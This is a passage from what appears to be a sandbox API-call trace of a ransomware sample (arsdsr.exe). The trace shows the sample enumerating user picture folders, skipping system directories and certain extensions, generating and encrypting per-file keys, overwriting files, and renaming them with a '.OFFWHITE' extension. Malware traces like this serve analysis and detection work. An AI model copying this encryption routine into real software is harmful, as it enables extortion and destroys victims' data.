returned 0x500000 [0135.482] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.482] GetProcessHeap () returned 0x500000 [0135.482] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.482] GetProcessHeap () returned 0x500000 [0135.482] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.482] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\pGSGRrzfIwBBfb.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\pGSGRrzfIwBBfb.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\pGSGRrzfIwBBfb.gif" [0135.482] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\pGSGRrzfIwBBfb.gif", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\pGSGRrzfIwBBfb.gif.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\pGSGRrzfIwBBfb.gif.OFFWHITE" [0135.482] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\pGSGRrzfIwBBfb.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\pgsgrrzfiwbbfb.gif"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\pGSGRrzfIwBBfb.gif.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\pgsgrrzfiwbbfb.gif.offwhite")) returned 1 [0135.486] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7024db0, ftCreationTime.dwHighDateTime=0x1d5e2bc, ftLastAccessTime.dwLowDateTime=0xec86a1d0, ftLastAccessTime.dwHighDateTime=0x1d5d8c9, ftLastWriteTime.dwLowDateTime=0xec86a1d0, ftLastWriteTime.dwHighDateTime=0x1d5d8c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x80007e, dwReserved1=0x295e370, cFileName="rMts7wxti", cAlternateFileName="RMTS7W~1")) returned 1 [0135.486] lstrcmpiW (lpString1="rMts7wxti", lpString2=".") returned 1 [0135.486] lstrcmpiW (lpString1="rMts7wxti", lpString2="..") returned 1 [0135.486] lstrcmpiW (lpString1="rMts7wxti", lpString2="...") returned 1 [0135.486] lstrcmpiW (lpString1="rMts7wxti", lpString2="windows") returned -1 [0135.486] lstrcmpiW (lpString1="rMts7wxti", lpString2="$recycle.bin") returned 1 [0135.486] lstrcmpiW (lpString1="rMts7wxti", lpString2="rsa") returned -1 [0135.486] lstrcmpiW (lpString1="rMts7wxti", lpString2="ntuser.dat") returned 1 [0135.486] lstrcmpiW (lpString1="rMts7wxti", lpString2="programdata") returned 1 [0135.486] lstrcmpiW (lpString1="rMts7wxti", lpString2="appdata") returned 1 [0135.486] lstrcmpiW (lpString1="rMts7wxti", lpString2="program files") returned 1 [0135.486] lstrcmpiW (lpString1="rMts7wxti", lpString2="program files (x86)") returned 1 [0135.486] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" [0135.486] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\", lpString2="rMts7wxti" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti" [0135.486] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" [0135.487] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" [0135.487] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\*.*" [0135.487] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7024db0, ftCreationTime.dwHighDateTime=0x1d5e2bc, ftLastAccessTime.dwLowDateTime=0xec86a1d0, ftLastAccessTime.dwHighDateTime=0x1d5d8c9, ftLastWriteTime.dwLowDateTime=0xec86a1d0, ftLastWriteTime.dwHighDateTime=0x1d5d8c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d1bc, dwReserved1=0x3742a4d2, cFileName=".", cAlternateFileName="")) returned 0x544750 [0135.488] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0135.488] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7024db0, ftCreationTime.dwHighDateTime=0x1d5e2bc, ftLastAccessTime.dwLowDateTime=0xec86a1d0, ftLastAccessTime.dwHighDateTime=0x1d5d8c9, ftLastWriteTime.dwLowDateTime=0xec86a1d0, ftLastWriteTime.dwHighDateTime=0x1d5d8c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d1bc, dwReserved1=0x3742a4d2, cFileName="..", cAlternateFileName="")) returned 1 [0135.488] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0135.488] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0135.488] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x236d7440, ftCreationTime.dwHighDateTime=0x1d5e11b, ftLastAccessTime.dwLowDateTime=0xe81c3150, ftLastAccessTime.dwHighDateTime=0x1d5e486, ftLastWriteTime.dwLowDateTime=0xe81c3150, ftLastWriteTime.dwHighDateTime=0x1d5e486, nFileSizeHigh=0x0, nFileSizeLow=0xe4a1, dwReserved0=0x295d1bc, dwReserved1=0x3742a4d2, cFileName="bGgGhiT.gif", cAlternateFileName="")) returned 1 [0135.488] lstrcmpiW (lpString1="bGgGhiT.gif", lpString2=".") returned 1 [0135.488] lstrcmpiW (lpString1="bGgGhiT.gif", lpString2="..") returned 1 [0135.488] lstrcmpiW (lpString1="bGgGhiT.gif", lpString2="...") returned 1 [0135.488] lstrcmpiW (lpString1="bGgGhiT.gif", lpString2="windows") returned -1 [0135.488] lstrcmpiW (lpString1="bGgGhiT.gif", lpString2="$recycle.bin") returned 1 [0135.488] lstrcmpiW (lpString1="bGgGhiT.gif", lpString2="rsa") returned -1 [0135.488] lstrcmpiW (lpString1="bGgGhiT.gif", lpString2="ntuser.dat") returned -1 [0135.489] lstrcmpiW (lpString1="bGgGhiT.gif", lpString2="programdata") returned -1 [0135.489] lstrcmpiW (lpString1="bGgGhiT.gif", lpString2="appdata") returned 1 [0135.489] lstrcmpiW (lpString1="bGgGhiT.gif", lpString2="program files") returned -1 [0135.489] lstrcmpiW (lpString1="bGgGhiT.gif", lpString2="program files (x86)") returned -1 [0135.489] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" [0135.489] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\", lpString2="bGgGhiT.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\bGgGhiT.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\bGgGhiT.gif" [0135.489] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.489] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.489] PathFindExtensionW (pszPath="bGgGhiT.gif") returned=".gif" [0135.489] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0135.489] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0135.489] lstrcmpiW (lpString1=".gif", lpString2=".cab") returned 1 [0135.489] lstrcmpiW (lpString1=".gif", lpString2=".cmd") returned 1 [0135.489] lstrcmpiW (lpString1=".gif", lpString2=".com") returned 1 [0135.489] lstrcmpiW (lpString1=".gif", lpString2=".cpl") returned 1 [0135.489] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0135.489] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0135.489] lstrcmpiW (lpString1=".gif", lpString2=".url") returned -1 [0135.489] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0135.489] lstrcmpiW (lpString1=".gif", lpString2=".mp3") returned -1 [0135.489] lstrcmpiW (lpString1=".gif", lpString2=".pif") returned -1 [0135.489] lstrcmpiW (lpString1=".gif", lpString2=".mp4") returned -1 [0135.489] lstrcmpiW (lpString1=".gif", lpString2=".OFFWHITE") returned -1 [0135.489] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0135.489] lstrcmpiW (lpString1="bGgGhiT.gif", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.489] GetProcessHeap () returned 0x500000 [0135.489] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531a70 [0135.489] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\bGgGhiT.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\bggghit.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0135.490] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=58529) returned 1 [0135.490] GetProcessHeap () returned 0x500000 [0135.490] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.490] GetProcessHeap () returned 0x500000 [0135.490] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.490] GetProcessHeap () returned 0x500000 [0135.490] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.490] GetProcessHeap () returned 0x500000 [0135.490] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.490] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.490] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.490] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.490] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.490] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.490] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.490] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.490] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.490] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295cf90*=0x100) returned 1 [0135.490] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.490] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.491] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0135.491] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xe4a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.491] SetLastError (dwErrCode=0x0) [0135.491] WriteFile (in: hFile=0x218, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.493] GetLastError () returned 0x0 [0135.493] GetLastError () returned 0x0 [0135.493] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xe5a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.493] WriteFile (in: hFile=0x218, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.493] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xe6a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.493] WriteFile (in: hFile=0x218, lpBuffer=0x531a70*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531a70*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0135.493] GetProcessHeap () returned 0x500000 [0135.493] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xe4a1) returned 0x55c7c8 [0135.493] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.493] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0xe4a1, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0xe4a1, lpOverlapped=0x0) returned 1 [0135.497] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.497] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0xe4a1, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0xe4a1, lpOverlapped=0x0) returned 1 [0135.497] GetProcessHeap () returned 0x500000 [0135.497] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0135.497] CloseHandle (hObject=0x218) returned 1 [0135.500] GetProcessHeap () returned 0x500000 [0135.500] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.500] GetProcessHeap () returned 0x500000 [0135.500] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.500] GetProcessHeap () returned 0x500000 [0135.500] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.500] GetProcessHeap () returned 0x500000 [0135.500] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.500] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\bGgGhiT.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\bGgGhiT.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\bGgGhiT.gif" [0135.500] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\bGgGhiT.gif", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\bGgGhiT.gif.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\bGgGhiT.gif.OFFWHITE" [0135.500] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\bGgGhiT.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\bggghit.gif"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\bGgGhiT.gif.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\bggghit.gif.offwhite")) returned 1 [0135.501] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26dd2250, ftCreationTime.dwHighDateTime=0x1d5dcb7, ftLastAccessTime.dwLowDateTime=0xc73ffc0, ftLastAccessTime.dwHighDateTime=0x1d5e5f3, ftLastWriteTime.dwLowDateTime=0xc73ffc0, ftLastWriteTime.dwHighDateTime=0x1d5e5f3, nFileSizeHigh=0x0, nFileSizeLow=0x12624, dwReserved0=0x295d1bc, dwReserved1=0x3742a4d2, cFileName="CtHTE0PEy.jpg", cAlternateFileName="CTHTE0~1.JPG")) returned 1 [0135.501] lstrcmpiW (lpString1="CtHTE0PEy.jpg", lpString2=".") returned 1 [0135.501] lstrcmpiW (lpString1="CtHTE0PEy.jpg", lpString2="..") returned 1 [0135.501] lstrcmpiW (lpString1="CtHTE0PEy.jpg", lpString2="...") returned 1 [0135.501] lstrcmpiW (lpString1="CtHTE0PEy.jpg", lpString2="windows") returned -1 [0135.501] lstrcmpiW (lpString1="CtHTE0PEy.jpg", lpString2="$recycle.bin") returned 1 [0135.501] lstrcmpiW (lpString1="CtHTE0PEy.jpg", lpString2="rsa") returned -1 [0135.501] lstrcmpiW (lpString1="CtHTE0PEy.jpg", lpString2="ntuser.dat") returned -1 [0135.501] lstrcmpiW (lpString1="CtHTE0PEy.jpg", lpString2="programdata") returned -1 [0135.501] lstrcmpiW (lpString1="CtHTE0PEy.jpg", lpString2="appdata") returned 1 [0135.501] lstrcmpiW (lpString1="CtHTE0PEy.jpg", lpString2="program files") returned -1 [0135.501] lstrcmpiW (lpString1="CtHTE0PEy.jpg", lpString2="program files (x86)") returned -1 [0135.501] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" [0135.501] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\", lpString2="CtHTE0PEy.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\CtHTE0PEy.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\CtHTE0PEy.jpg" [0135.501] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.501] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.501] PathFindExtensionW (pszPath="CtHTE0PEy.jpg") returned=".jpg" [0135.501] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0135.501] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0135.501] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0135.501] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0135.502] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0135.502] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0135.502] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0135.502] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0135.502] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0135.502] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0135.502] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0135.502] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0135.502] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0135.502] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0135.502] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0135.502] lstrcmpiW (lpString1="CtHTE0PEy.jpg", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.502] GetProcessHeap () returned 0x500000 [0135.502] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531a80 [0135.502] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\CtHTE0PEy.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\cthte0pey.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0135.502] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=75300) returned 1 [0135.502] GetProcessHeap () returned 0x500000 [0135.502] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.502] GetProcessHeap () returned 0x500000 [0135.502] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.502] GetProcessHeap () returned 0x500000 [0135.502] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.502] GetProcessHeap () returned 0x500000 [0135.502] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.502] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.502] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.503] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.503] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.503] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.503] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.503] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.503] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.503] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295cf90*=0x100) returned 1 [0135.503] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.503] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.503] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0135.503] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x12624, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.503] SetLastError (dwErrCode=0x0) [0135.503] WriteFile (in: hFile=0x218, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.505] GetLastError () returned 0x0 [0135.505] GetLastError () returned 0x0 [0135.505] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x12724, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.505] WriteFile (in: hFile=0x218, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.505] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x12824, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.505] WriteFile (in: hFile=0x218, lpBuffer=0x531a80*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531a80*, 